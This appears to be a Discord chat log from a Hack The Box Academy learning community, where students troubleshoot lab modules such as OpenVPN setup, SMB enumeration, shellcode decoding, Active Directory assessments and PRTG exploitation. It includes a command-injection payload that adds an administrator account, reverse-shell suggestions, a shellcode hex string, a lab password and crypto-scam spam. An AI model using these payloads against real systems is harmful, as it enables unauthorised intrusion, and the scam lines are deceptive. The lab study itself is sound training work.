yea this is just where i ended up at because it seems like i tried everything

😦

Anyways, check if the key format is correct

You don’t need the key in your own ssh directory

Just copy the one you get from the mail

ohh

Make sure it’s in correct format

And use that

@final mica Once you get the SSH key from the mail, save it as key.txt. Then rename key.txt as mykey.pem. Then chmod 600 mykey.pem

then, ssh -i mykey.pem tom@

okay thank you i will try

No problem. Footprinting is no joke 😂

It took me some days

<@&861185840277487616>

i dont understand why this worked... i had the key in id_rsa file and tried to connect the same way

damn, my BTC gone

ty

Mine too

Smh was about to get rich

i got scammed by @jolly cradle

Who deleted

Thanks for ruining my life falcon

yes

i could be rich now

You're welcome

thank you so much

If you send me about 5 SOL I will triple it in the next 15 minutes only.

@next bronze question... How do I connect the ovpn to my VM? I installed Kali on VirtualBox.

https://tenor.com/view/blah-eye-roll-annoyed-face-gif-26916741

Address

This would be right:

If you send me about 5 SOL I will ban you in the next 15 minutes only.

286755fad04869ca523320acce0dc6a4

sudo openvpn <yourVpnFile.ovpn>

The .pem (Privacy Enhanced Mail) format for SSH private keys is often recommended for a few reasons:
Compatibility and Standard Format: The .pem format is widely recognized and compatible with many different types of software and systems. It's a base64-encoded format that includes the key itself along with additional information like the type of key, encryption algorithm used, and sometimes comments. This makes it versatile for various applications, including SSH, SSL/TLS, and other cryptographic needs.
Security: .pem files can store both private and public keys. They are often used for secure transmissions and can be password-protected for additional security. This means that even if someone gains access to your .pem file, they would still need the password to use it.
Ease of Conversion: If you have a key in another format, it's generally straightforward to convert it to .pem format using tools like OpenSSL. This flexibility allows you to use the same key across different systems and applications that may require different formats.
AWS and Other Cloud Services: Many cloud services, like Amazon Web Services (AWS), use the .pem format for SSH keys to access virtual servers (like EC2 instances). If you're working in a cloud environment, using .pem files can make it easier to manage and deploy keys.
Support for Different Key Types: The .pem format supports various cryptographic algorithms, including RSA, DSA, and ECDSA. This means you can use it for different types of keys, depending on your security requirements and the systems you are working with.
When using SSH with a .pem file, you typically specify the private key file with the -i option in your SSH command, like so:
ssh -i /path/to/key.pem user@hostname
This tells SSH to use the provided private key for authentication instead of looking for the default key in the ~/.ssh directory.

Free 600$

holy wall of text

good night HTB

thank you

good night 😵‍💫

No problem ... Here to learn

Scam

you need to guess the correct address

Gotta crack the hash for the address

May the odds ever be in your favor

(should take like 10sec even with a potato gpu and hashcat)

or even jtr

Download the .ovpn configuration file on your Kali VM (in the home directory). Then open a terminal and type "sudo openvpn academy.ovpn" or however your .ovpn file is named ...

can you not copy paste chatgpt output pls thanks

I got hunter2

Thanks! almost there now. 🙂

Ok ... But then I will just give a short and not exhaustive answer next time ...

Yeah, and?

All I see is *******

Ok no problem

chatgpt output is useless because if someone wanted a chatgpt response they can just use it themselves. Youre providing no additional insight to the matter.

I can't believe discord auto hides passwords 🤯

👍🏻 👍🏻 I will type next time

can someone help on module 49. Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer.I have tried running Get-Process | select-object Processname, id but am not sure what non-stanard update service to ook out for. I am not familiar withall of them

What is module 49 ?

windows fundamentals

Uh, I still have to do that

xD

you can lookout for non microsoft services

when in doubt start googling

yes

is telling me to enter this instead: openvpn /path/to/NameHere.ovpn
I also tried: sudo openvpn /path/to/NameHere.ovpn
and: sudo openvpn NameHere.ovpn

But it wont work

@fringe crystal

did you write out the path or did you literally write the words /path/to/NameHere.ovpn

Are you entering that verbatim? Or is NameHere replaced with the name of the ovpn file?

and for that matter did you specify the right filename

No. Where it says NameHere I added what is telling me to add lol.
I guess what I am doing wrong is the path/to part then.

In my previous answer, I told you to download the .ovpn file in the home directory. But it should be into home/kali

guess its FoxitReaderUpdateService even though Foxit reader is a pdf editor

you just gotta supply the path of wherever you put the file

once it is into home/kali, then open the terminal and type sudo openvpn academy.ovpn

Ah I missed that part.

when they want .exe bruhh

i usually leave them in downloads and just do sudo openvpn ~/Downloads/madf0x.ovpn

it is easier if you put into home/kali because by default the terminal opens up in home/kali

me to

the question asked for Submit the full name of the service executable the executable is responsible for the service

Realistically if thats easier you should probably be doing linux fundementals first instead

and .exe is part of that

there's something that I am missing ?

.exe means it's a windows executable

does mac use .exe?

no

.exe refers to the PE executable file type. Its Microsoft windows exclusive

not counting emulation shenanigans or polyfiles

acktually if you have wine installed you cause run exe on mac 🤓

^ addressed

damnit too slow

anyone else have a stuck taskbar? on windows at times even wiht autohide enabled

@thorn urchin I am so sorry, but nothing works. I tried these:
sudo openvpn ~/Downloads/name.ovpn

and: sudo openvpn kali/Downloads/madf0x.ovpn

nothing works 😦

first thing, you need to know what your ovpn file's name is, you can't just copy exactly what the others have used, where did you download the .ovpn file to?

Downloads

okay, now run ls ~/Downloads, what's the name of the .ovpn file?

share screenshot of your terminal

So, do I have to enter that whole name like it shows on the file?

well there you go, use that name in your sudo openvpn command

Ok. I was doing what the "Pending COnnection.." message was saying. But, let me try it this way

That is the way its telling you

you just have to supply the full filename, its not psychic and doesnt know what file youre referring to until you tell it

Alright! Thanks!
but this is very different than what you guys told me though

I dont understand why you think its very different

you gotta supply the correct file name. That image is just using placeholders

Alright! I understand now. I'll keep that in mind going forward. Thank you again.

I used madf0x.ovpn because thats what mine is named lol

you might want to start with the linux fundamentals module

absolutely this

Will do.

I'm trying to log into samba share on last section of Enumeration with Nmap module. I'm past the Nmap part and need help with figuring out the password

to the samba share

so I can log into it

┌─[us-academy-1]─[10.10.14.144]─[htb-ac-605555@htb-5rribmwn0c]─[~]
└──╼ [★]$ smbclient //10.129.2.47/ -U us-academy-1

I tried adding in -L

and sudo

and its not working

You need to specify a share when connecting

how do I figure out the share?

When you do -L it lists the shares

I did that but it won't let me see the shares

Also the user won't be us-academy-1

─[us-academy-1]─[10.10.14.144]─[htb-ac-605555@htb-5rribmwn0c]─[~]
└──╼ [★]$ sudo smbclient -L //10.129.2.47/
do_connect: Connection to 10.129.2.47 failed (Error NT_STATUS_IO_TIMEOUT)

ok hold on

┌─[us-academy-1]─[10.10.14.144]─[htb-ac-605555@htb-5rribmwn0c]─[~]
└──╼ [★]$ sudo smbclient //10.129.2.47/ -L
Password for [WORKGROUP\root]:

Just hit enter

It'll still show shares

I did and it didn't show any shares

there's something off here

The section tells you some things to try

You

ok hold on

There's another flag to basically skip asking for a password

oh wow

Also this section doesn't need smb login at all

The flag is a banner you get when you connect to the port

So, rescan the target - your only hint is non-standard

-N - don't ask for password.

Anyone know why or how to remedy this issue for the footprints lab - medium?

re-read the section about how NFS works

hi, im working on the live engagement for Shells & Payloads and every time i RDP into the foothold machine it times out and stops responding to pings

it was working completely fine yesterday, but now whenever i RDP in with the target IP it lets me into the machine, then a few seconds later it freezes up and the connection times out

└─$ xfreerdp /v:10.129.247.64 /u:htb-student /p:HTB_@cademy_stdnt!
[22:38:13:381] [16214:16215] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[22:38:13:381] [16214:16215] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[22:38:13:396] [16214:16215] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[22:38:13:397] [16214:16215] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[22:38:40:031] [16214:16215] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[22:38:40:031] [16214:16215] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[22:38:40:031] [16214:16215] [INFO][com.freerdp.client.common] - Network disconnect!

I've reset the target like... 5 times and it's the same result every time, I even got myself a fresh VPN file

ok i swapped my VPN file from UDP to TCP and it seems to be working now, please disregard

hello, Could anyone know this question format?

Hello, I'm stuck on skills assessment question 1 of 'Intro to Assembly Language'. I've worked through and I think I have the correct decoded shellcode, but it doesn't work. When I run the shellcode, it just returns a weird red dollar sign and exits when I try to type anything. This is the code I added to the nasm code to iterate and xor the shellcode:

mov rcx, 14
lea rdx, [rsp]
loop1:
xor [rdx], rbx
add rdx, 8
loop loop1

Here is the shellcode I'm getting:

48bbe6714831c05044215348167e66af7c7ab51bbba72346bf264d344c5348bb5348bb9a4bb67743e771125310633620214d14d248bbd244c980c10444214831311f48834889e7484831c0b0c708e2f740b70148014831ffe64831d231f648894831c048b21e0f0531ff0f0583c03c48

I don't understand what I'm doing wrong, can someone help me? Thank you!

[Ctrl] + [v] as an example

lol that question was phrased incredibly confusing, I've been using tmux for a number of years and it still took me a while to get it

Wait I think I copy and pasted the wrong shellcode, here is the shellcode i'm getting:
4831c05044215348167e66af7c7ab51bbba72346bf264d344c5348bb5348bb9a4bb67743e771125310633620214d14d248bbd244c980c10444214831311f48834889e7484831c0b0c708e2f740b70148014831ffe64831d231f648894831c048b21e0f0531ff0f05

I get the same result (weird red dollar sign) though

hi does anyone recommend a dns brute force domain list?

I'm using the DNS brute script or DNS Zone Transfer

Can you please help me with this? I found 2 rights in bloodhound as well but cant clear the question.

Probably one of the SecList ones

I don't remember how excatly I did it but it's better for you to run the modified shellcode in gdb and step though it so that you know what went wrong

and you can do the whole thing in cyberchef btw, there are a few steps but basically reverse the bits and xor it

The names are different on Bloodhound. You'd need to do some external research for the exact name academy expects or sometimes by resolving the name in PowerView.

ok thanks. I will try that soon good idea. I ought to go into nmap and try that one out

has anyone gotten the options error cmd line 1 when opening openvpn? The file isn’t corrupt, I updated the openvpn reinstalled the parrot os. Not sure what else to try

Why are you doing it with Nmap scripting

Running with sudo?

Yes

What's the full error?

Give me a sec I’ll show the terminal

You won't be able to paste a screenshot until you verify your main account following #welcome

Options error: In [cmd-line] :1: error opening configuration file lab.ovpn

Is it named lab.ovpn?

Are you in the same directory as the file

Yes an yes

Ls downloads then copy verbatim

Are you using absolute or relative path

If you're in the same directory you don't need to specify path

And the website uses /path/to/ as a placeholder

Yea once I open download dir. I sudo openvpn lab.ovpn

Worked in past now I get the error

That error usually means that it doesn't exist

I used killall openvpn command to

Make sure nothing was in use

please keep the channel on topic

Remember you can always refer to the help center - https://help.hackthebox.com/

This is off topic?

Fixing error messages related to the VPN is unrelated to the channel's intent

Thanks, I found the name :w

On the Attacking Common Services - Medium, do we have to get ftp access on port 2121 via brute force / anonymous access?
Just afraid I'm wasting time so would be nice to know if it's the wrong way lol (say nothing more than that of course! no spoiler!)

Iirc it gives you creds could be wrong though

I see thanks mate. anonymous login failed for me so will wait for the brute force to finish I guess, thanks!

You do have a username if you look closely 😉

kk more than enough thanks mate

Also their password is weak if you wanna try a smaller list first

Sounds good, I'm afraid from their brute-force so the real password won't be in the list lol

All g

Stuck on AD Enumeration & Attacks - Skills Assessment Part I

Question:
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

I have creds of svc_sXX and tpXXXX. Done rdp to svc_sXX and explored but didn't found a way to get to DC01

Can anybody help?

Just on the verge of completion of the module 🥲

hey guy, I'm stuck on last 2 Q in AD second assessment to long,
don't know what I missed ...

need a little nudge please

@short hare @umbral fulcrum check what rights the user has, you don't even need to check bloodhound, the question clearly tells you that, go back the the previous sections to find out what you can do with those rights

Thing is that I can spwan a powershell of tpXXXX through creds of svc_sXX but the powershell is too much unresponsive
And also running tools from tpXXX gives access denied
And

Opening powershell through creds of tpXXX also gives access denied to the tools that i uploaded
Stuck in the middle

Hello! Could anyone help me with the Attacking Common Web services module? At PRTG right now and no matter what, I cannot get a RCE by notification abuse. Tried different payloads, no result so far.

check what rights the user has and what you can do with it

for the 5th day, can anyone please help me, i am at Broken Authentication username injection, tried to add the userid field but didnt work because of the oldpass doesnt match, tried to fuzz it, tried remove it, tried to change to GET method and changing the submet, but no luck so far

which is best tier 3 module? i can get only one with student sub so i want it to be worth it

common web services? is there a module like that

you just need to inject one parameter

when you reset your password

Sorry, officially it is: Attacking Common Applications

what have you tried so far

@patent whale

Tried the payload as shown in the module, and the original CVE blog. Tried | instead of ;. Tried creating the user and adding him to the administrators group, tried to just create aa user (single command). Tried pinging back, while tcpdumping icmp.

';' works fine

which payload did you use

try to get a reverse shell

Tried || test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add ||, tried username and pass without any special chars (in case they break sth.). I wanted to try ping and the reverse shell would be the next step.

try the reverse shell

Maybe icmp is firewalled from the box.

Will do

icmp works too

you are making a mistake probably

That's the thing, I was not able to catch ping back, so I didn't move on to reverse shell. Will try hrader. 😄

anyone

That's a very subjective answer my guy

what is your opinion then

I haven't done any so couldn't tell you, but I'd pick one that's related to something that interests you

@candid lily Tried 3 different PS reverse shells, no success.

i want to pick one which has no other sources to learn

did you get icmp to work

Nope. That's why I suspect no RCE is happening.

maybe the problem is where you are injection, try to get icmp work, have a look at the CVE before it

I did. And used the same payload.

try using base64 ps revshells

Tried already.

If I cannot get ping working, maybe I am not executing anything.

are you sure thats your right ip 😅

did you activate the notification or not?

you have to click the bell icon

speciall chars are encoded when you send anything through a website